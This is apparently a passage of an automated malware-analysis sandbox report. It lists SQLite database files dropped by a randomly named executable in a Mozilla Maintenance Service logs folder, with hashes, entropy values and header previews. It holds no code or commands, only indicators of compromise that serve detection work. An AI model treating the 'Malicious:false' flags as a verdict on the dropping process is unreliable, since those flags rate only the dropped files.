                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
